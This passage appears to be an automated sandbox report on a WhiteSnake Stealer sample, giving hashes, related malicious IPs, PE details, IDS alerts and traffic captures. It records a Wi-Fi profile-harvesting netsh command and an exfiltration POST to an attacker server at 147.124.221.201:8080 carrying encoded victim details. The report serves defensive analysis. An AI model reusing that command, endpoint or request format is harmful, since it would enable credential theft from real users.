                                                                                        REnBTVfW8q.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                        • ip-api.com/line/?fields=hosting

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        ip-api.comfile.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                        • 208.95.112.1
                                                                                        4tuMnSBgXFwIxMP.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        20092837.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 208.95.112.1
                                                                                        dg4Bwri6Cy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 208.95.112.1
                                                                                        DHOYXfCAeB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 208.95.112.1
                                                                                        tfz7ikR76n.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        RgAm3scap8.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 208.95.112.1
                                                                                        173088012436cb09e4ff67d5495bafb892243773781ebe8236073aca4dd15efcce792bb9ed419.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        aviso de transferencia de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        REnBTVfW8q.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                        • 208.95.112.1

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        TUT-ASUSfile.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                        • 208.95.112.1
                                                                                        4tuMnSBgXFwIxMP.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        20092837.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 208.95.112.1
                                                                                        dg4Bwri6Cy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 208.95.112.1
                                                                                        DHOYXfCAeB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 208.95.112.1
                                                                                        tfz7ikR76n.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        RgAm3scap8.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 208.95.112.1
                                                                                        173088012436cb09e4ff67d5495bafb892243773781ebe8236073aca4dd15efcce792bb9ed419.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        aviso de transferencia de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        REnBTVfW8q.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                        • 208.95.112.1
                                                                                        AC-AS-1US1730880306408ce5a11c4acbd87ce646537573d0c4601d89669cd8afd0c5878f4ef95c84f5795.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                        • 147.124.222.72
                                                                                        arm7.elfGet hashmaliciousUnknownBrowse
                                                                                        • 147.124.40.29
                                                                                        la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                        • 65.217.187.16
                                                                                        armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                        • 147.124.15.96
                                                                                        PnjGB63sit.elfGet hashmaliciousMiraiBrowse
                                                                                        • 147.124.15.89
                                                                                        na.elfGet hashmaliciousMiraiBrowse
                                                                                        • 147.124.15.83
                                                                                        M3NRruYkxl.exeGet hashmaliciousAveMariaBrowse
                                                                                        • 147.124.214.5
                                                                                        na.elfGet hashmaliciousMiraiBrowse
                                                                                        • 147.124.15.54
                                                                                        SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exeGet hashmaliciousRemcosBrowse
                                                                                        • 147.124.212.210
                                                                                        http://www.hycompressor.net/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 147.124.214.113

                                                                                        JA3 Fingerprints

                                                                                        No context

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:CSV text
                                                                                        Category:dropped
                                                                                        Size (bytes):1498
                                                                                        Entropy (8bit):5.364175471524945
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoC1qE4GIs0E4K6sXE4Npv:MxHKQEAHKKkKYHKGSI6oPtHTHK1qHGI8
                                                                                        MD5:1B713A2FD810C1C9A8F6F6BE36F406B1
                                                                                        SHA1:0828576CB8B83C21F36AD29E327D845AB3574EBB
                                                                                        SHA-256:E51E809582894F4D484939BE3990DFC914E43F4AF72AE55A00B01FCFE348763B
                                                                                        SHA-512:D32200B7FA9D0DFEF4011D98D40260838A522E63C874FBCCE00D331D663169DBE1C613AD0E81C76F69A8CE6C7265605175CA75BA2C8BDA7748290B34579E148B
                                                                                        Malicious:true
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                                                        C:\Users\user\AppData\Local\o08k2d5ob5\report.lock

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:very short file (no magic)
                                                                                        Category:dropped
                                                                                        Size (bytes):1
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:U:U
                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                        Malicious:false
                                                                                        Preview:1

                                                                                        \Device\Null

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\timeout.exe
                                                                                        File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.41440934524794
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                                        MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                                        SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                                        SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                                        SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                                        Malicious:false
                                                                                        Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):5.507680890929418
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        File name:file.exe
                                                                                        File size:158'208 bytes
                                                                                        MD5:c426f46f2c074eda8c903f9868be046d
                                                                                        SHA1:d0352482370beff107eb2b2f13e2de275fbc91c7
                                                                                        SHA256:7cba781d569196e89a86f10cee7d69918fe05df1461d1f0ed3426ccb2046002e
                                                                                        SHA512:97eed1bad31bd2e558d2cf6ff3c3026d828f561e2d1439f0daca420f53a3c6b1d59442f043357be9a33761a8e99ac935d08239d2e50811d47909cec8caad7c05
                                                                                        SSDEEP:3072:d0Elo8nshOJIlE+/sY3I9bf4gDJVYRhYKdDrQOu:dPlo8sh8+EY3I9bfdDbcyO
                                                                                        TLSH:F5F3F95BB2409FA4D15E8E72A1B213314360D9079E81BF4A5D9BE4D02DD32C6AB136FF
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............."...0..^..........^|... ........@.. ....................................`................................

                                                                                        File Icon

                                                                                        Icon Hash:90cececece8e8eb0

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x427c5e
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0xE480C158 [Mon Jun 25 20:55:52 2091 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x27c0c0x4f.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x280000x748.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2a0000xc.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000x25c640x25e0038278eb8d7651ee347dd3c95376751d2False0.4184844265676568data5.527582650945179IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0x280000x7480x800429c42ce30e93d62dad0375ad663f16eFalse0.44189453125data4.535915142151478IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x2a0000xc0x2009f1dfa1ae77f70e189a22ec3e0385709False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_VERSION0x280a00x4bcdata0.4793729372937294
                                                                                        RT_MANIFEST0x2855c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                        Imports

                                                                                        DLLImport
                                                                                        mscoree.dll_CorExeMain

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-11-07T03:07:01.140283+01002050601ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request1192.168.2.449731147.124.221.2018080TCP
                                                                                        2024-11-07T03:07:01.191138+01002050602ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration1192.168.2.449731147.124.221.2018080TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 7, 2024 03:06:59.585902929 CET4973080192.168.2.4208.95.112.1
                                                                                        Nov 7, 2024 03:06:59.590930939 CET8049730208.95.112.1192.168.2.4
                                                                                        Nov 7, 2024 03:06:59.591010094 CET4973080192.168.2.4208.95.112.1
                                                                                        Nov 7, 2024 03:06:59.592438936 CET4973080192.168.2.4208.95.112.1
                                                                                        Nov 7, 2024 03:06:59.597238064 CET8049730208.95.112.1192.168.2.4
                                                                                        Nov 7, 2024 03:07:00.186609983 CET8049730208.95.112.1192.168.2.4
                                                                                        Nov 7, 2024 03:07:00.233290911 CET4973080192.168.2.4208.95.112.1
                                                                                        Nov 7, 2024 03:07:00.780725956 CET497318080192.168.2.4147.124.221.201
                                                                                        Nov 7, 2024 03:07:00.785711050 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:00.785778999 CET497318080192.168.2.4147.124.221.201
                                                                                        Nov 7, 2024 03:07:00.785918951 CET497318080192.168.2.4147.124.221.201
                                                                                        Nov 7, 2024 03:07:00.790699005 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.140283108 CET497318080192.168.2.4147.124.221.201
                                                                                        Nov 7, 2024 03:07:01.145337105 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.145366907 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.145391941 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.145402908 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.145415068 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.145426035 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.145431995 CET497318080192.168.2.4147.124.221.201
                                                                                        Nov 7, 2024 03:07:01.145437956 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.145452976 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.145452976 CET497318080192.168.2.4147.124.221.201
                                                                                        Nov 7, 2024 03:07:01.145467997 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.145479918 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.145497084 CET497318080192.168.2.4147.124.221.201
                                                                                        Nov 7, 2024 03:07:01.145534992 CET497318080192.168.2.4147.124.221.201
                                                                                        Nov 7, 2024 03:07:01.150439978 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.150454998 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.150466919 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.150490999 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.150500059 CET497318080192.168.2.4147.124.221.201
                                                                                        Nov 7, 2024 03:07:01.150501966 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.150513887 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.150530100 CET497318080192.168.2.4147.124.221.201
                                                                                        Nov 7, 2024 03:07:01.150573015 CET497318080192.168.2.4147.124.221.201
                                                                                        Nov 7, 2024 03:07:01.190968990 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.191138029 CET497318080192.168.2.4147.124.221.201
                                                                                        Nov 7, 2024 03:07:01.238912106 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.238971949 CET497318080192.168.2.4147.124.221.201
                                                                                        Nov 7, 2024 03:07:01.262458086 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.262639046 CET497318080192.168.2.4147.124.221.201
                                                                                        Nov 7, 2024 03:07:01.268836021 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.268853903 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.268879890 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.268892050 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.268903971 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.268918037 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.268946886 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.268959045 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.268970013 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.268980980 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.269006968 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.269017935 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.269036055 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.269047976 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.269062996 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.269073963 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.269156933 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.269169092 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.269181013 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.269191980 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.269202948 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.269215107 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.269226074 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.269237995 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.269258022 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.269269943 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.269361019 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.270191908 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.381724119 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.432231903 CET497318080192.168.2.4147.124.221.201
                                                                                        Nov 7, 2024 03:07:01.795144081 CET808049731147.124.221.201192.168.2.4
                                                                                        Nov 7, 2024 03:07:01.842613935 CET497318080192.168.2.4147.124.221.201
                                                                                        Nov 7, 2024 03:07:03.585989952 CET497318080192.168.2.4147.124.221.201
                                                                                        Nov 7, 2024 03:07:03.586488008 CET4973080192.168.2.4208.95.112.1

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 7, 2024 03:06:59.536093950 CET6053353192.168.2.41.1.1.1
                                                                                        Nov 7, 2024 03:06:59.543138981 CET53605331.1.1.1192.168.2.4

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Nov 7, 2024 03:06:59.536093950 CET192.168.2.41.1.1.10x96e5Standard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Nov 7, 2024 03:06:59.543138981 CET1.1.1.1192.168.2.40x96e5No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • ip-api.com
                                                                                        • 147.124.221.201:8080

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449730208.95.112.1807260C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 7, 2024 03:06:59.592438936 CET85OUTGET /line?fields=query,country HTTP/1.1
                                                                                        Host: ip-api.com
                                                                                        Connection: Keep-Alive
                                                                                        Nov 7, 2024 03:07:00.186609983 CET199INHTTP/1.1 200 OK
                                                                                        Date: Thu, 07 Nov 2024 02:06:59 GMT
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Content-Length: 29
                                                                                        Access-Control-Allow-Origin: *
                                                                                        X-Ttl: 60
                                                                                        X-Rl: 44
                                                                                        Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 0a
                                                                                        Data Ascii: United States173.254.250.79


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.449731147.124.221.20180807260C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 7, 2024 03:07:00.785918951 CET253OUTPOST /sendData?pk=QzU5OUI3MkVDOEQxQjhFMTM4MUIyQTcyNTlBOUQ4N0Q=&ta=RGVmYXVsdA==&un=am9uZXM=&pc=OTgwMTA4&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1
                                                                                        Host: 147.124.221.201:8080
                                                                                        Content-Length: 134077
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        Nov 7, 2024 03:07:01.381724119 CET25INHTTP/1.1 100 Continue
                                                                                        Nov 7, 2024 03:07:01.795144081 CET162INHTTP/1.1 200 OK
                                                                                        Content-Length: 36
                                                                                        Content-Type: application/json
                                                                                        Date: Thu, 07 Nov 2024 02:07:01 GMT
                                                                                        Server: waitress
                                                                                        Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 53 75 63 63 65 73 73 22 2c 22 73 74 61 74 75 73 22 3a 74 72 75 65 7d 0a
                                                                                        Data Ascii: {"message":"Success","status":true}


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:21:06:57
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                        Imagebase:0x1d7a5710000
                                                                                        File size:158'208 bytes
                                                                                        MD5 hash:C426F46F2C074EDA8C903F9868BE046D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:1
                                                                                        Start time:21:06:57
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                                                                                        Imagebase:0x7ff7f2ed0000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:21:06:57
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:21:06:57
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\chcp.com
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:chcp 65001
                                                                                        Imagebase:0x7ff6e6d80000
                                                                                        File size:14'848 bytes
                                                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
